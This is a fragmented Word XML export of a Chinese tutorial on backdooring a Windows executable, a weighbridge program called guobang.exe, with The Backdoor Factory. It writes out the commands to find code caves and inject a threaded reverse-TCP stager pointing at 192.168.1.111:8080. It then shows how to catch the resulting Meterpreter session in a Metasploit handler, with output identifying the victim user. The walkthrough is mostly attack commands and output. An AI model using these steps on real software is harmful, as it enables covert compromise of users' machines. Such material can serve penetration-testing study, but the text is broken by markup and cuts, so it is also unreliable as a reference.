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54.600pt;margin-top:327.600pt;width:467.400pt;height:70.8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-4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-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://github.com/secretsquirrel/the-backdoor-facto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ry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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>原理：可执行二进制文件中有大量的00，这些00是不包</w:t>
      </w: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含数据的，将这些数据替换成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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload，并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>且在程序执行的时候，jmp到代码段，来触发payload。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以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>项目中的过磅系统为例：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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1060" w:firstLine="0"/>
      </w:pP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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="6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383838"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>git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383838"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>clone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3783"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://github.com/secretsquirrel/the-backdoor-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3783"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>fa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ctory.git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c7fbd"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//安装the-backd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oor-factory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2" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="3092" w:firstLine="0"/>
      </w:pP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10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/the-backdoor-factory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="36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./backdoor.py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-f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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/demo/guobang.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-47"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-S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c7fbd"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/检测是否支持后门植入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19.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId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7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3" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="3092" w:firstLine="0"/>
      </w:pP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10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/the-backdoor-factory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="36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./backdoor.py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-f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~/demo/guobang.exe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-c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-l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150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c7fbd"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//测试裂缝空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>间size150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583.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId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11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/the-backdoor-factory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./backdoor.py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-f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7187" w:firstLine="0"/>
      </w:pP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~/demo/guobang.exe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0000"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-s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show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4c7fbd"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//查看可用p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload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1.400pt;height:332.399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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1250" w:firstLine="0"/>
      </w:pP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11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/the-backdoor-factory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./backdoor.py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-f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~/demo/guobang.exe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-H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192.168.1.111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-P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8080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-s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iat_reverse_tcp_stager_threaded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4c7fbd"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//插入payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，并生成文件。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80.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:510.600pt;width:467.400pt;height:52.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:624.600pt;width:467.400pt;height:46.799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2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3" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2213" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="16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16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/the-backdoor-factory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="32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20"/>
        </w:rPr>
        <w:t> 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md5sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> 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./guobang.exe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/root/demo/guoba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ng.exe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c7fbd"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>比原文件与生成文件MD5值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7" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2588" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12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12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/the-backdoor-factory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="31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du</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> 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-k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> 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./guobang.exe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/root/demo/guoba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ng.exe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c7fbd"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/对比文件大小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2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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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exploit/multi/handler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2826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1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exploit(handler)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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payload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windows/meterpreter/reverse_tcp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payload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=&gt;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windows/meterpreter/reverse_tcp</w:t>
      </w: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exploit(handler)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14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set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lhost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192.168.1.111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53.600pt;width:420.600pt;height:142.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:335.399pt;width:464.400pt;height:247.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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lhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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=&gt;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192.168.1.111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exploit(handler)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set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lport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8080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lport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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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8080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7058" w:firstLine="0"/>
      </w:pP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msf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exploit(handler)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8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exploit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-j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4c7fbd"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/开启本地监听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4c7fbd"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/打开软件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9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meterpreter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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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getuid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7034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Server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username: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John-PC\John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4c7fbd"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="4c7fbd"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/确定目标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360.0pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:375.600pt;height:241.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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9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